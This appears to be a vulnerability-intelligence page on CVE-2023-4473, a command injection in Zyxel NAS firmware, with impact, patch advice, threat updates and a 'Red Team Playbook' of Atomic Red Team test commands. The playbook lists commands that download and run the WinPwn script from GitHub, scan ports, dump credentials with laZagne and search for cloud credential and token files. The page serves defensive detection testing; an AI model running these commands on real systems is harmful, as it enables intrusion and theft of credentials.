CVE-2023-4473
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the web server component of Zyxel NAS326 and NAS542 firmware versions V5.21(AAZF.14)C0 and V5.21(ABAG.11)C0 respectively. The flaw arises because user-supplied data in crafted URLs is executed directly by the underlying operating system shell without sanitization, allowing arbitrary OS command execution. The affected component is the firmware's embedded web server handling HTTP requests.
Vulnerability Description
A command injection vulnerability in the web server of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted URL to a vulnerable device.
Impact
An unauthenticated attacker with network access to the device's web interface can execute arbitrary operating system commands remotely, potentially leading to full system compromise. This includes the ability to read, modify, or delete data, disrupt services, or pivot within the network. The vulnerability requires no user interaction or privileges (CVSS vector AV:N/AC:L/PR:N/UI:N), making exploitation straightforward in exposed environments. The high severity reflects the complete confidentiality, integrity, and availability impact on affected devices.
Solution
Zyxel has released firmware updates addressing these command injection vulnerabilities in NAS products. Users should upgrade Zyxel NAS326 to firmware version later than V5.21(AAZF.14)C0 and NAS542 to versions beyond V5.21(ABAG.11)C0 as detailed in the Zyxel Security Advisory available at https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-authentication-bypass-and-command-injection-vulnerabilities-in-nas-products. No specific workarounds are noted; applying the official firmware update is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The command injection vulnerability present in the Zyxel NAS326 and NAS542 firmware versions poses a significant threat to the security of devices operating these systems. This flaw allows an unauthenticated attacker to execute arbitrary operating system commands by manipulating crafted URLs sent to the web server of the affected devices. The vulnerability arises from insufficient input validation, which permits the execution of commands that should be restricted. By exploiting this weakness, attackers can gain unauthorized access to the underlying operating system, potentially leading to full control over the device.
Attack vectors for this vulnerability are relatively straightforward, as they primarily involve sending specially crafted HTTP requests to the web server. An attacker could leverage social engineering tactics to trick users into visiting a malicious link or could automate the process using a script to scan for vulnerable devices on the network. Once a vulnerable device is identified, the attacker can execute OS commands that could lead to data exfiltration, service disruption, or further network compromise. This type of exploitation could also serve as a foothold for lateral movement within a network, allowing attackers to pivot to more sensitive systems.
The real-world impact of this vulnerability is profound, especially for organizations that rely on these NAS devices for data storage and management. Given the high CVSS score of 9.8, the risk associated with this vulnerability is critical. Successful exploitation could lead to unauthorized access to sensitive data, including personal information, intellectual property, or proprietary business data. The potential for data breaches could result in significant financial losses, reputational damage, and regulatory penalties, particularly for organizations subject to data protection laws. Additionally, the compromised devices could be repurposed for launching further attacks, creating a cascading effect on the security posture of the entire network.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions provided by Zyxel is crucial, as these updates often include patches for known vulnerabilities. Network segmentation can also be employed to limit the exposure of NAS devices to untrusted networks. Intrusion detection systems (IDS) should be configured to monitor for suspicious HTTP requests that may indicate exploitation attempts. Furthermore, organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities before they can be exploited.
In conclusion, the command injection vulnerability in Zyxel NAS devices represents a critical security risk that requires immediate attention from affected organizations. The potential for unauthorized OS command execution could lead to severe consequences, including data breaches and operational disruptions. By adopting proactive detection and mitigation strategies, organizations can significantly reduce their exposure to this vulnerability and enhance their overall cybersecurity posture. It is imperative for stakeholders to remain vigilant and responsive to emerging threats in order to safeguard their digital assets.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-4473, with our sensors registering the first confirmed sighting of exploitation attempts targeting vulnerable Zyxel NAS devices. Although no new exploit variants or proof-of-concept code have surfaced, this initial detection signals a transition from theoretical risk to active threat. The stability of the EPSS score at a high percentile underscores the ongoing potential for exploitation, while the sudden emergence of attack attempts elevates the urgency for defenders to monitor their environments closely. This development increases the practical threat level, indicating that adversaries are now actively probing or attempting to leverage this critical command injection vulnerability, thereby heightening the risk of unauthorized system compromise and operational impact.
Update 2 — July 31, 2026
CSURFACE threat intelligence has identified a marked escalation in attempts to exploit the command injection vulnerability affecting Zyxel NAS326 and NAS542 devices. Our telemetry indicates that adversaries are increasingly probing vulnerable systems with crafted URLs, signaling a shift from isolated testing to more persistent reconnaissance or exploitation efforts. Although no new exploit variants or proof-of-concept code have surfaced, the uptick in activity underscores a growing operational interest in this flaw. This development elevates the threat level by confirming active targeting, which increases the likelihood of successful compromise if devices remain unpatched. Defenders should recognize this as a clear indication that the vulnerability is no longer theoretical but actively sought after by threat actors, thereby intensifying the risk to affected environments.
Update 3 — August 18, 2026
CSURFACE threat intelligence has identified a marked escalation in reconnaissance and exploitation attempts targeting the Zyxel NAS326 vulnerability. Our telemetry indicates that adversaries are increasingly probing affected devices with crafted URLs, reflecting a shift from opportunistic scanning to more deliberate exploitation efforts. Although no new exploit variants or publicly available proof-of-concept code have been detected, the surge in activity signals heightened attacker interest and operational momentum. This intensification elevates the threat posture by increasing the probability of successful intrusions, particularly in environments where firmware remains unpatched. Consequently, the vulnerability’s risk profile has shifted from theoretical to actively exploited, underscoring the urgency for defenders to prioritize detection and response measures.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Nas326 Firmware | All |
cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Nas542 Firmware | All |
cpe:2.3:o:zyxel:nas542_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-4473 |
| zyxel.com |
GitHub CVE
vendor-advisory
|
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-authentication-bypass-and-command-injection-vulnerabilities-in-nas-products |
| bugprove.com |
GitHub CVE
|
https://bugprove.com/knowledge-hub/cve-2023-4473-and-cve-2023-4474-authentication-bypass-and-multiple-blind-os-command-injection-vulnerabilities-in-zyxel-s-nas-326-devices/ |